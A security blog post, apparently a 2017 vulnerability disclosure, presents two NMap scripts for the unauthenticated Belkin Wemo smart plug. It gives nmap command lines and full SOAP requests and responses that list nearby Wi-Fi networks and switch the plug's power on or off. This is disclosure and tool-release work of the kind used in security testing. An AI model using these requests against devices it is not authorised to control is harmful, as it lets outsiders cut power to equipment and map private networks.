Belkin Wemo Switch NMap Scripts

Belkin Wemo Switch NMap Scripts

Posted on June 23, 2017 by Pedro Joaquin



Belkin Wemo Switch Smart Plug is a network controlled power outlet. The current firmware version WeMo_WW_2.00.10966.PVT-OWRT-SNS does not requiere authentication to switch the power ON or OFF or to gather information such as nearby wireless networks. Two NMap scripts have been published for this purposes.




wemo-info.nse
Download: https://github.com/hkm/nmap-nse-scripts/blob/master/wemo-info.nse

wemo-info.nse obtains information from Wemo Switch from an XML file and a service both located on the web interface on a port in the range 49152 to 49154. The XML file is located on the URL /setup.xml. This file contains information about the device such as name, model, version, serial, firwmare version and current switch state. Information about nearby wireless networks is gathered by issuing a SOAP request to /upnp/control/WiFiSetup1 using the method GetApList.

To gather information from a Belkin Wemo Switch use the following command:

# nmap --script wemo-info.nse -p49152-49254 <target>

Request:

POST /upnp/control/WiFiSetup1 HTTP/1.0
Host: 192.168.1.80
Content-Type: text/xml
Content-Length: 239
SOAPACTION: "urn:Belkin:service:WiFiSetup1:1#GetApList"


<?xml ?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body>
<u:GetApList xmlns:u="urn:Belkin:service:WiFiSetup1:1">
</u:GetApList>
</s:Body>
</s:Envelope>

Response:

HTTP/1.0 200 OK
CONTENT-LENGTH: 493
CONTENT-TYPE: text/xml; charset="utf-8"
DATE: Thu, 22 Jun 2017 17:01:01 GMT
EXT:
SERVER: Unspecified, UPnP/1.0, Unspecified
X-User-Agent: redsonic

<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body>
<u:GetApListResponse xmlns:u="urn:Belkin:service:WiFiSetup:1">
<ApList>Page:1/1/6$
INFINITUM|1|24|WPA1PSKWPA2PSK/TKIPAES,
INFINITUMu|5|0|WPA1PSKWPA2PSK/TKIPAES,
INFINITUM|6|0|WPA2PSK/AES,
INFINITUM|6|20|WEP,
INFINITUM|8|29|WPA2PSK/AES,
INFINITUM|10|10|WPA1PSKWPA2PSK/TKIPAES,
</ApList>
</u:GetApListResponse>
</s:Body> </s:Envelope>



wemo-switch.nse
Download: https://github.com/hkm/nmap-nse-scripts/blob/master/wemo-switch.nse

wemo-switch.nse is a script that changes the switch state (ON/OFF). This script issues a SOAP request to /upnp/control/basicevent1 using the method SetBinaryState. This method is populated using the value defined in the NMap argument BinaryState.

In order to turn the device connected to the Wemo Switch OFF you would need to issue the following command:

# nmap --script wemo-switch.nse --script-args BinaryState=0 -p49152-49254 <target>

Request:

POST /upnp/control/basicevent1 HTTP/1.0
Content-Type: text/xml; charset="utf-8"
HOST: 192.168.1.80
Content-Length: 316
SOAPACTION: "urn:Belkin:service:basicevent:1#SetBinaryState"
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body>
<u:SetBinaryState xmlns:u="urn:Belkin:service:basicevent1:1">
<BinaryState>1</BinaryState>
</u:SetBinaryState>
</s:Body>
</s:Envelope>

Response:

HTTP/1.0 200 OK
CONTENT-LENGTH: 376
CONTENT-TYPE: text/xml; charset="utf-8"
DATE: Thu, 22 Jun 2017 17:52:02 GMT
EXT:
SERVER: Unspecified, UPnP/1.0, Unspecified
X-User-Agent: redsonic

<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body>
<u:SetBinaryStateResponse xmlns:u="urn:Belkin:service:basicevent:1">
<BinaryState>1</BinaryState>
<CountdownEndTime>0</CountdownEndTime>
<deviceCurrentTime>1498153922</deviceCurrentTime>
</u:SetBinaryStateResponse>
</s:Body> </s:Envelope>

Latest Blog Entries

Belkin Wemo Switch NMap Scripts
Belkin Wemo Switch Smart Plug is a network controlled power outlet. The current firmware version does not requiere authentication to switch the power ON or OFF or to gather information such as nearby wireless networks. Two NMap scripts have been published

Downloading an Application's Entire Source Code Through an Exposed GIT Directory
Website administrators sometimes inadvertently leave an exposed .git directory, from which it is possible to download the entire source code of the web application using just wget and a common server misconfiguration.

credmap: The Credential Mapper
An overview of credmap, an open source penetration testing tool that automates the process of testing for credential reuse. It does so by testing supplied user credentials on known websites and verifies if the password has been reused on any of these.

Latest News

Blackhat EU 2015
Websec participated with two tools at the Blackhat, EU Arsenal held in Amsterdam, NL from the 10-13 of November, 2015. During this event, we introduced our brand new tool "credmap: The Credential Mapper" and also presented an amped-up version of Panoptic.

BSides Vancouver 2015
Websec is proud to announce that we will be attending the 3rd annual edition of BSides Vancouver, a local non-profit information security conference held in the heart of Vancouver, BC on March 16 and 17.